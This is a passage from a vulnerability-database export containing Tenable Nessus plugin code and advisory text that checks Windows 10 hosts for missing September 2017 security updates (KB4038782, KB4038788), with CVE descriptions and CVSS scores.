vulnerability could obtain information to\n further compromise the users system.(CVE-2017-8683)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive.\n (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object.(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability.(CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system.\n (CVE-2017-8699)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality.\n (CVE-2017-8702)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system.\n input. (CVE-2017-8704)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8711,\n CVE-2017-8712, CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights.(CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8731, CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does\n not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could trick a\n user by redirecting the user to a specially crafted\n website. The specially crafted website could either\n spoof content or serve as a pivot to chain an attack\n with other vulnerabilities in web services.\n (CVE-2017-8735)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session.(CVE-2017-8746)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660, CVE-2017-8741,\n CVE-2017-8748)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user.(CVE-2017-8750)\n\n - A security feature bypass exists in Microsoft Edge when\n the Edge Content Security Policy (CSP) fails to properly\n validate certain specially crafted documents. An\n attacker who exploited the bypass could trick a user\n into loading a page containing malicious content.\n (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8738, CVE-2017-8752,\n CVE-2017-8753, CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way\n Microsoft Edge handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system.\n (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)\");\n # https://support.microsoft.com/en-us/help/4038782/windows-10-update-kb4038782\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?62a3aab5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4038782.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-09\";\nkbs = make_list('4038782');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"09_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4038782])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:35:46", "description": "The remote Windows host is missing security update 4038788.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code execution vulnerability exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-11766)\n\n - An information disclosure vulnerability exists when Microsoft Edge does not properly handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system.\n (CVE-2017-8597)\n\n - A spoofing vulnerability exists in Microsoft's implementation of the Bluetooth stack. An attacker who successfully exploited this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer. (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when Microsoft Edge improperly handles clipboard events. For an attack to be successful, an attacker must persuade a user to visit a malicious website and leave it open during clipboard activities. The update addresses the vulnerability by changing how Microsoft Edge handles clipboard events in the browser. (CVE-2017-8643)\n\n - An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8648)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8649)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8649, CVE-2017-8660)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.(CVE-2017-8677)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2017-8678)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2017-8678, CVE-2017-8679)\n\n - A information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the memory address of a kernel object.(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability.(CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when Windows Shell does not properly validate file copy destinations. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system.\n (CVE-2017-8706)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system.\n (CVE-2017-8706, CVE-2017-8707)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system.\n (CVE-2017-8706, CVE-2017-8707, CVE-2017-8712)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2017-8706, CVE-2017-8707, CVE-2017-8712,CVE-2017-8713)\n\n - A security feature bypass vulnerability exists when Windows Control Flow Guard mishandles objects in memory.\n (CVE-2017-8716)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709, CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. (CVE-2017-8720)\n\n - A security feature bypass exists in Microsoft Edge when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker who exploited the bypass could trick a user into loading a page containing malicious content.\n (CVE-2017-8723)\n\n - A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content. (CVE-2017-8724)\n\n - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-8728)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. To exploit the vulnerability, the user must either browse to a malicious website or be redirected to it.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8734)\n\n - A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content. An attacker who successfully exploited this vulnerability could trick a user by redirecting the user to a specially crafted website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.\n (CVE-2017-8724, CVE-2017-8735)\n\n - An information disclosure vulnerability exists in Microsoft browsers due to improper parent domain verification in certain functionality. An attacker who successfully exploited the vulnerability could obtain specific information that is used in the parent domain.\n (CVE-2017-8736)\n\n - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-8728, CVE-2017-8737)\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft Edge. (CVE-2017-8739)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.(CVE-2017-8649, CVE-2017-8660, CVE-2017-8741)\n\n - A security feature bypass vulnerability exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploited this vulnerability could inject code into a trusted PowerShell process to bypass the Device Guard Code Integrity policy on the local machine.\n (CVE-2017-8746)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.(CVE-2017-8747)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8649, CVE-2017-8660, CVE-2017-8741, CVE-2017-8748)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.(CVE-2017-8747, CVE-2017-8749)\n\n - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8750)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-8734, CVE-2017-8751)\n\n - A security feature bypass exists in Microsoft Edge when the Edge Content Security Policy (CSP) fails to properly validate certain specially crafted documents. An attacker who exploited the bypass could trick a user into loading a page containing malicious content. To exploit the bypass, an attacker must trick a user into either loading a page containing malicious content or visiting a malicious website. The attacker could also inject the malicious page into either a compromised website or an advertisement network. The update addresses the bypass by correcting how the Edge CSP validates documents. (CVE-2017-8723, CVE-2017-8754)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11764, CVE-2017-8729, CVE-2017-8740, CVE-2017-8752, CVE-2017-8753, CVE-2017-8755, CVE-2017-8756)\n\n - A remote code execution vulnerability exists in the way Microsoft Edge handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8757)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8759) \n - An information disclosure vulnerability exists in Microsoft browsers in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose files on a user's computer. (CVE-2017-8529)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-09-12T00:00:00", "type": "nessus", "title": "KB4038788: Windows 10 Version 1703 September 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0161", "CVE-2017-11764", "CVE-2017-11766", "CVE-2017-8529", "CVE-2017-8597", "CVE-2017-8628", "CVE-2017-8643", "CVE-2017-8648", "CVE-2017-8649", "CVE-2017-8660", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8692", "CVE-2017-8695", "CVE-2017-8699", "CVE-2017-8706", "CVE-2017-8707", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8712", "CVE-2017-8713", "CVE-2017-8716", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8723", "CVE-2017-8724", "CVE-2017-8728", "CVE-2017-8729", "CVE-2017-8733", "CVE-2017-8734", "CVE-2017-8735", "CVE-2017-8736", "CVE-2017-8737", "CVE-2017-8739", "CVE-2017-8740", "CVE-2017-8741", "CVE-2017-8746", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750", "CVE-2017-8751", "CVE-2017-8752", "CVE-2017-8753", "CVE-2017-8754", "CVE-2017-8755", "CVE-2017-8756", "CVE-2017-8757", "CVE-2017-8759"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038788.NASL", "href": "https://www.tenable.com/plugins/nessus/103130", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103130);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8597\",\n \"CVE-2017-8628\",\n \"CVE-2017-8643\",\n \"CVE-2017-8648\",\n \"CVE-2017-8649\",\n \"CVE-2017-8660\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8706\",\n \"CVE-2017-8707\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8712\",\n \"CVE-2017-8713\",\n \"CVE-2017-8716\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8723\",\n \"CVE-2017-8724\",\n \"CVE-2017-8728\",\n \"CVE-2017-8729\",\n \"CVE-2017-8733\",\n \"CVE-2017-8734\",\n \"CVE-2017-8735\",\n \"CVE-2017-8736\",\n \"CVE-2017-8737\",\n \"CVE-2017-8739\",\n \"CVE-2017-8740\",\n \"CVE-2017-8741\",\n \"CVE-2017-8746\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\",\n \"CVE-2017-8751\",\n \"CVE-2017-8752\",\n \"CVE-2017-8753\",\n \"CVE-2017-8754\",\n \"CVE-2017-8755\",\n \"CVE-2017-8756\",\n \"CVE-2017-8757\",\n \"CVE-2017-8759\",\n \"CVE-2017-11764\",\n \"CVE-2017-11766\"\n );\n script_xref(name:\"MSKB\", value:\"4038788\");\n script_xref(name:\"MSFT\", value:\"MS17-4038788\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4038788: Windows 10 Version 1703 September 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038788.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - A vulnerability exists when Microsoft Edge improperly\n accesses objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-11766)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the user's system.\n (CVE-2017-8597)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles clipboard events. For\n an attack to be successful, an attacker must persuade a\n user to visit a malicious website and leave it open\n during clipboard activities. The update addresses the\n vulnerability by changing how Microsoft Edge handles\n clipboard events in the browser. (CVE-2017-8643)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8648)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8649, CVE-2017-8660)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.(CVE-2017-8677)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system.\n (CVE-2017-8677, CVE-2017-8681)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object.(CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability.(CVE-2017-8688)\n\n - A remote code execution vulnerability exists due 